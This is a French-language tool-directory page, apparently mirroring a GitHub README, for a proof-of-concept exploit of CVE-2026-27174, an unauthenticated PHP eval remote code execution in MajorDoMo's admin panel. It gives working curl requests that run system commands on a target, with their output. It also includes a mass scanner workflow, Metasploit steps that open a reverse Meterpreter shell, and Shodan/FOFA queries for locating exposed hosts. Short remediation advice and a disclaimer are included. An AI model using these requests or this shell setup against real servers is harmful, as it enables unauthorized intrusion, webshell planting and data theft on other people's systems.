Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - Une exécution de code à distance non authentifiée via la fonctionnalité console PHP du panneau d'administration. | Kitploit
Outils/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - Une exécution de code à distance non authentifiée via la fonctionnalité console PHP du panneau d'administration.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 5 moisPas encore vérifié

majordomo-CVE-2026-27174-poc

Une preuve de concept exploitant une exécution de code à distance non authentifiée via la fonctionnalité de console PHP du panneau d'administration de MajorDomo (Major Domestic Module).

Vulnérabilité

Le panneau d'administration de MajorDoMo expose une console d'évaluation PHP via /admin.php. En raison d'une absence de sortie après une redirection d'authentification dans panel.class.php, le gestionnaire AJAX inc_panel_ajax.php est inclus inconditionnellement — rendant son eval() accessible à toute requête HTTP non authentifiée.

Un attaquant peut exécuter du code PHP arbitraire avec une simple requête GET, sans nécessiter d'identifiants, d'accès préalable ni d'interaction de la victime.

Versions affectées

  • Toutes les versions de MajorDomo antérieures au correctif du 18 février 2026.

Scanner de détection

scan.py est un scanner multi-thread non destructif qui détecte les hôtes vulnérables à la CVE-2026-27174 sans exécuter de charge utile malveillante.

Comment ça fonctionne

Le scanner opère en trois phases séquentielles par cible :

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

Un marqueur alphanumérique aléatoire est généré pour chaque requête afin d'éviter les faux positifs dus à la mise en cache, aux WAF ou à la pollution des réponses.

Utilisation

Prérequis

root@kitploit:~
pip install requests

1. Préparer un fichier de cibles

Créez un fichier targets.txt avec une ligne IP:PORT par cible :

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Lancer le scanner

root@kitploit:~
python3 scan.py targets.txt

Sortie

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Généré automatiquement lorsqu'au moins un hôte vulnérable est trouvé :

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]

Exploitation

En fonction du résultat du champ system_functions_available dans le fichier result.json, nous pouvons élaborer une requête GET utilisant la ou les fonctions système pour exploiter la RCE :

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automatisation

Module Metasploit :

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

Dans la nature

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

Impact

Un attaquant distant non authentifié peut :

  • Exécuter du code PHP arbitraire sur le serveur
  • Lire des fichiers sensibles (/etc/passwd, fichiers de configuration, identifiants)
  • Écrire des webshells PHP pour un accès persistant
  • Passer à l'exécution de commandes au niveau OS si les fonctions PHP system, exec, shell_exec ou passthru ne sont pas désactivées

L'impact réel dépend de la configuration PHP disable_functions du serveur :

CVSS 4.0 - 9.3 CRITIQUE — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITIQUE — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remédiation et atténuation

Mettez à jour vers la dernière version de MajorDomo (Major Domestic Module).

ContrôleEmpêche la RCEEmpêche l'exécution OS

Références

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

Avertissement

Cet outil est réservé aux tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal.

Télécharger l’outil
ChampDescription
targetIP:PORT scanné
urlURL complète où la RCE a été confirmée
rce_phpExécution de code PHP confirmée (toujours true dans les résultats)
disable_functionsParamètre PHP disable_functions du serveur (null s'il est vide)
system_functions_availableFonctions d'exécution OS appelables par un attaquant
impact_levelHIGH (exécution OS accessible) ou MEDIUM (RCE PHP uniquement)
ScénarioNiveau d'impactDescription
Aucun disable_functionsCRITIQUEExécution complète de commandes OS
Restrictions partiellesÉLEVÉRCE PHP + exécution OS partielle
disable_functions bloque toute exécutionMOYENRCE PHP uniquement (lecture/écriture de fichiers, exfiltration de données)
Appliquer le correctif du 18 févr. 2026✅✅
Pare-feu / liste blanche IP sur /admin.php✅✅
Durcissement de disable_functions❌✅